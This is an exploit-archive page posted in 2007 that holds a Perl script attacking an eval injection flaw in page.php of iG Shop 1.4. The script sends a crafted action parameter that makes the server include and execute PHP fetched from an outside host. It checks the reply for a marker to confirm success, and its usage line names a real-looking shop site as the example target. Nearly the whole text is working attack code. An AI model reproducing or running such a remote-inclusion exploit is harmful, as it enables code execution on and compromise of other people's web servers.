Home / exploits igshop14-eval.txt
Posted on 20 June 2007
#!/usr/bin/perl -w use LWP::UserAgent; #################################################################### #iG Shop 1.4 eval Inclusion Vulnerability #found by IFX #nyubicrew #Vulnerability on page.php #if (!$action) # $action = "make"; #// here the function will be called. #eval ("page_$action();"); #################################################################### die "Example: perl $0 http://www.planetgolfuk.co.uk/shop " unless @ARGV; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $url = $ARGV[0] . "/page.php?action=|include($_GET[cok]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?"; $res = $b->request(HTTP::Request->new(GET=>$url)); $respone = $res->content; if ($respone =~ /nyelipin file ;P/i){ print " Tembus... "; print " $url "; } else{ print " Gagal cok... "; }